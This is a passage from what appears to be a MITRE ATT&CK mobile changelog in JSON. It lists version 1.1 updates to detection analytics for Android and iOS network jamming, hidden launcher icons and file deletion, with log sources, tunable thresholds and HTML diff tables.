class=\"diff_add\">(2)&nbsp;deletion&nbsp;of&nbsp;those&nbsp;files&nbsp;or&nbsp;wipe-like&nbsp;destructive&nbsp;actions</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">uest&nbsp;device&nbsp;administrator&nbsp;permissions.&nbsp;The&nbsp;user&nbsp;can&nbsp;view&nbsp;app</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;through&nbsp;ordinary&nbsp;storage&nbsp;access,&nbsp;administrative&nbsp;controls,&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">lications&nbsp;with&nbsp;administrator&nbsp;access&nbsp;through&nbsp;the&nbsp;device&nbsp;setti</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;privileged/rooted&nbsp;paths,&nbsp;and&nbsp;(3)&nbsp;continued&nbsp;app&nbsp;or&nbsp;device&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ngs,&nbsp;and&nbsp;may&nbsp;also&nbsp;notice&nbsp;if&nbsp;user&nbsp;data&nbsp;is&nbsp;inexplicably&nbsp;missin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctivity&nbsp;after&nbsp;deletion,&nbsp;including&nbsp;cleanup,&nbsp;concealment,&nbsp;or&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">g.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">utbound&nbsp;transfer.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;files&nbsp;are&nbsp;first&nbsp;accessed&nbsp;or&nbsp;prepared,&nbsp;then&nbsp;removed,&nbsp;and&nbsp;dev</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ice-side&nbsp;behavior&nbsp;continues&nbsp;after&nbsp;evidence&nbsp;or&nbsp;data&nbsp;is&nbsp;gone.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--bfbe9c72-f373-4d03-a08a-1448f31dd92f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-11 16:29:42.519000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0639#AN1713",
                            "external_id": "AN1713"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1713",
                    "description": "Defender correlates an Android-specific causal chain where device connectivity degrades or oscillates across one or more radios, applications lose or repeatedly reattempt network access, and the radio or network failure pattern is inconsistent with ordinary mobility, coverage transition, or user-initiated airplane mode behavior. The defender correlates radio state, connectivity framework behavior, application state, network session failures, and location/network-provider degradation to distinguish network denial effects from routine weak-signal conditions.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "android:MDMLog",
                            "channel": "No user-initiated airplane mode, radio disablement, or managed network setting change occurred during repeated connectivity degradation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "android:MDMLog",
                            "channel": "Managed Wi-Fi, VPN, cellular, or location-related policy state remains unchanged while network capability degrades"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "MobileEDR:telemetry",
                            "channel": "App with network-, telephony-, Wi-Fi-, or location-adjacent capability is impacted by abrupt repeated service loss while permissions remain unchanged"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum span for correlating connectivity degradation, application retry behavior, and network-session failure into a single denial event."
                        },
                        {
                            "field": "ExpectedMobilityPopulation",
                            "description": "Users or device populations expected to move through low-coverage zones or transit environments that naturally cause network oscillation."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps expected to generate frequent retry behavior or maintain persistent sessions under ordinary weak-signal conditions."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether impacted applications are expected to be actively visible to the user for the analytic to carry high confidence."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Time threshold for determining whether connectivity degradation occurred during active device use versus idle background operation."
                        },
                        {
                            "field": "FailureBurstThreshold",
                            "description": "Threshold for repeated disconnects, resets, DNS failures, or transport failures within the correlation window."
                        },
                        {
                            "field": "LocationProviderDependencyList",
                            "description": "Apps or services expected to rely on GPS or network-based location and therefore likely to exhibit secondary degradation during jamming."
                        },
                        {
                            "field": "ExpectedCoverageZones",
                            "description": "Known sites or geographies with weak legitimate coverage that should be baseline-adjusted."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum span for correlating connectivity degradation, application retry behavior, and network-session failure into a single denial event.\"}, {\"field\": \"ExpectedMobilityPopulation\", \"description\": \"Users or device populations expected to move through low-coverage zones or transit environments that naturally cause network oscillation.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps expected to generate frequent retry behavior or maintain persistent sessions under ordinary weak-signal conditions.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether impacted applications are expected to be actively visible to the user for the analytic to carry high confidence.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Time threshold for determining whether connectivity degradation occurred during active device use versus idle background operation.\"}, {\"field\": \"FailureBurstThreshold\", \"description\": \"Threshold for repeated disconnects, resets, DNS failures, or transport failures within the correlation window.\"}, {\"field\": \"LocationProviderDependencyList\", \"description\": \"Apps or services expected to rely on GPS or network-based location and therefore likely to exhibit secondary degradation during jamming.\"}, {\"field\": \"ExpectedCoverageZones\", \"description\": \"Known sites or geographies with weak legitimate coverage that should be baseline-adjusted.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-11 16:29:42.519000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an Android-specific causal chain where device connectivity degrades or oscillates across one or more radios, applications lose or repeatedly reattempt network access, and the radio or network failure pattern is inconsistent with ordinary mobility, coverage transition, or user-initiated airplane mode behavior. The defender correlates radio state, connectivity framework behavior, application state, network session failures, and location/network-provider degradation to distinguish network denial effects from routine weak-signal conditions.\", \"old_value\": \"Unexpected loss of radio signal could indicate that a device is being actively jammed.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"android:MDMLog\", \"channel\": \"No user-initiated airplane mode, radio disablement, or managed network setting change occurred during repeated connectivity degradation\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"android:MDMLog\", \"channel\": \"Managed Wi-Fi, VPN, cellular, or location-related policy state remains unchanged while network capability degrades\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App with network-, telephony-, Wi-Fi-, or location-adjacent capability is impacted by abrupt repeated service loss while permissions remain unchanged\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to156__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to156__0\"><a href=\"#difflib_chg_to156__top\">t</a></td><td class=\"diff_header\" id=\"from156_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Unexpected&nbsp;loss&nbsp;of&nbsp;radio&nbsp;signal&nbsp;could&nbsp;indicate&nbsp;that&nbsp;a&nbsp;device</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to156__top\">t</a></td><td class=\"diff_header\" id=\"to156_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;Android-specific&nbsp;causal&nbsp;chain&nbsp;where&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;is&nbsp;being&nbsp;actively&nbsp;jammed.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">evice&nbsp;connectivity&nbsp;degrades&nbsp;or&nbsp;oscillates&nbsp;across&nbsp;one&nbsp;or&nbsp;more</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;radios,&nbsp;applications&nbsp;lose&nbsp;or&nbsp;repeatedly&nbsp;reattempt&nbsp;network&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccess,&nbsp;and&nbsp;the&nbsp;radio&nbsp;or&nbsp;network&nbsp;failure&nbsp;pattern&nbsp;is&nbsp;inconsist</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ent&nbsp;with&nbsp;ordinary&nbsp;mobility,&nbsp;coverage&nbsp;transition,&nbsp;or&nbsp;user-ini</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tiated&nbsp;airplane&nbsp;mode&nbsp;behavior.&nbsp;The&nbsp;defender&nbsp;correlates&nbsp;radio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;state,&nbsp;connectivity&nbsp;framework&nbsp;behavior,&nbsp;application&nbsp;state,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">network&nbsp;session&nbsp;failures,&nbsp;and&nbsp;location/network-provider&nbsp;degr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">adation&nbsp;to&nbsp;distinguish&nbsp;network&nbsp;denial&nbsp;effects&nbsp;from&nbsp;routine&nbsp;w</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eak-signal&nbsp;conditions.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1e8d1470-1e76-4f6f-b2c9-633800c4478a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-12 17:09:47.656000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0639#AN1714",
                            "external_id": "AN1714"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1714",
                    "description": "Defender correlates an iOS-specific reduced-confidence chain where a managed or supervised device remains active but experiences abrupt loss of network-dependent functionality, repeated session failure, or sustained communication inability without matching configuration changes or ordinary user action. Because direct radio-layer and RF-cause visibility is weaker on iOS, the defender emphasizes device posture, application wake or foreground behavior during service loss, protected network-policy stability, and downstream failure patterns observed in VPN or proxy telemetry.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "iOS:MDMLog",
                            "channel": "Managed Wi-Fi, VPN, cellular, or location-service policy remains unchanged while device connectivity repeatedly degrades"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "iOS:MDMLog",
                            "channel": "No user-initiated airplane mode or radio-related setting change occurred while applications experience repeated network unavailability"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "MobileEDR:telemetry",
                            "channel": "Network- or location-dependent app capability state remains unchanged while the app experiences sustained communication failure"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum span for correlating app activity, posture stability, and repeated network failure into a single denial event."
                        },
                        {
                            "field": "SupervisedOnly",
                            "description": "Whether the analytic should only apply to supervised devices with high-confidence MDM policy telemetry."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps expected to retry aggressively or queue offline work during routine coverage degradation."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether the app should be foreground or recently active for the analytic to be treated as high confidence."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Time threshold for determining whether the denial occurred during active user use versus background idle periods."
                        },
                        {
                            "field": "FailureBurstThreshold",
                            "description": "Threshold for repeated session failures, resets, timeouts, or DNS failures within the correlation window."
                        },
                        {
                            "field": "ExpectedCoverageZones",
                            "description": "Known sites or geographies where benign poor service should be baseline-adjusted."
                        },
                        {
                            "field": "TrustedDestinationAllowList",
                            "description": "Expected enterprise destinations whose temporary maintenance or outage should not be treated as device-targeted denial."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum span for correlating app activity, posture stability, and repeated network failure into a single denial event.\"}, {\"field\": \"SupervisedOnly\", \"description\": \"Whether the analytic should only apply to supervised devices with high-confidence MDM policy telemetry.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps expected to retry aggressively or queue offline work during routine coverage degradation.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether the app should be foreground or recently active for the analytic to be treated as high confidence.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Time threshold for determining whether the denial occurred during active user use versus background idle periods.\"}, {\"field\": \"FailureBurstThreshold\", \"description\": \"Threshold for repeated session failures, resets, timeouts, or DNS failures within the correlation window.\"}, {\"field\": \"ExpectedCoverageZones\", \"description\": \"Known sites or geographies where benign poor service should be baseline-adjusted.\"}, {\"field\": \"TrustedDestinationAllowList\", \"description\": \"Expected enterprise destinations whose temporary maintenance or outage should not be treated as device-targeted denial.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-12 17:09:47.656000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an iOS-specific reduced-confidence chain where a managed or supervised device remains active but experiences abrupt loss of network-dependent functionality, repeated session failure, or sustained communication inability without matching configuration changes or ordinary user action. Because direct radio-layer and RF-cause visibility is weaker on iOS, the defender emphasizes device posture, application wake or foreground behavior during service loss, protected network-policy stability, and downstream failure patterns observed in VPN or proxy telemetry.\", \"old_value\": \"Unexpected loss of radio signal could indicate that a device is being actively jammed.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"iOS:MDMLog\", \"channel\": \"Managed Wi-Fi, VPN, cellular, or location-service policy remains unchanged while device connectivity repeatedly degrades\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"iOS:MDMLog\", \"channel\": \"No user-initiated airplane mode or radio-related setting change occurred while applications experience repeated network unavailability\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Network- or location-dependent app capability state remains unchanged while the app experiences sustained communication failure\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to72__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to72__0\"><a href=\"#difflib_chg_to72__top\">t</a></td><td class=\"diff_header\" id=\"from72_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Unexpected&nbsp;loss&nbsp;of&nbsp;radio&nbsp;signal&nbsp;could&nbsp;indicate&nbsp;that&nbsp;a&nbsp;device</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to72__top\">t</a></td><td class=\"diff_header\" id=\"to72_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;iOS-specific&nbsp;reduced-confidence&nbsp;chain</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;is&nbsp;being&nbsp;actively&nbsp;jammed.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;where&nbsp;a&nbsp;managed&nbsp;or&nbsp;supervised&nbsp;device&nbsp;remains&nbsp;active&nbsp;but&nbsp;exp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eriences&nbsp;abrupt&nbsp;loss&nbsp;of&nbsp;network-dependent&nbsp;functionality,&nbsp;rep</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eated&nbsp;session&nbsp;failure,&nbsp;or&nbsp;sustained&nbsp;communication&nbsp;inability&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">without&nbsp;matching&nbsp;configuration&nbsp;changes&nbsp;or&nbsp;ordinary&nbsp;user&nbsp;acti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on.&nbsp;Because&nbsp;direct&nbsp;radio-layer&nbsp;and&nbsp;RF-cause&nbsp;visibility&nbsp;is&nbsp;we</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aker&nbsp;on&nbsp;iOS,&nbsp;the&nbsp;defender&nbsp;emphasizes&nbsp;device&nbsp;posture,&nbsp;applica</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;wake&nbsp;or&nbsp;foreground&nbsp;behavior&nbsp;during&nbsp;service&nbsp;loss,&nbsp;protec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ted&nbsp;network-policy&nbsp;stability,&nbsp;and&nbsp;downstream&nbsp;failure&nbsp;pattern</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;observed&nbsp;in&nbsp;VPN&nbsp;or&nbsp;proxy&nbsp;telemetry.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--964fc2e0-96fc-4992-b89a-8101d47b7d8c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 19:26:01.974000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0640#AN1715",
                            "external_id": "AN1715"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1715",
                    "description": "Correlates (1) changes to application visibility or user-facing presence such as launcher component disablement, icon suppression, or reduced discoverability, (2) continued application execution or privileged framework activity after that visibility reduction, and (3) follow-on behavior such as background network communication, sensor access, or persistence-related state transitions. The defender observes a causal chain where an application becomes less visible to the user while retaining or increasing operational activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "managed app inventory or launcher-visible state changes show application remains installed but user-facing entry point or launcher component becomes disabled before later runtime activity"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between visibility suppression and later hidden execution or network activity"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of legitimate apps allowed to hide launcher presence or disable user-facing components"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether post-hide activity is only suspicious when no foreground interaction occurs"
                        },
                        {
                            "field": "HiddenComponentThreshold",
                            "description": "Threshold for number or type of launcher-visible components disabled before raising suspicion"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound traffic volume used to distinguish meaningful hidden operation from benign background telemetry"
                        },
                        {
                            "field": "SensorAfterHideThreshold",
                            "description": "Threshold for sensor access frequency after visibility suppression"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
